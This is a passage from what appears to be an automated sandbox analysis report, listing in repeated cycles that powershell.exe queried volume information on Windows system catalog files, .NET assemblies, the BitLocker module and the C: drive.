                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
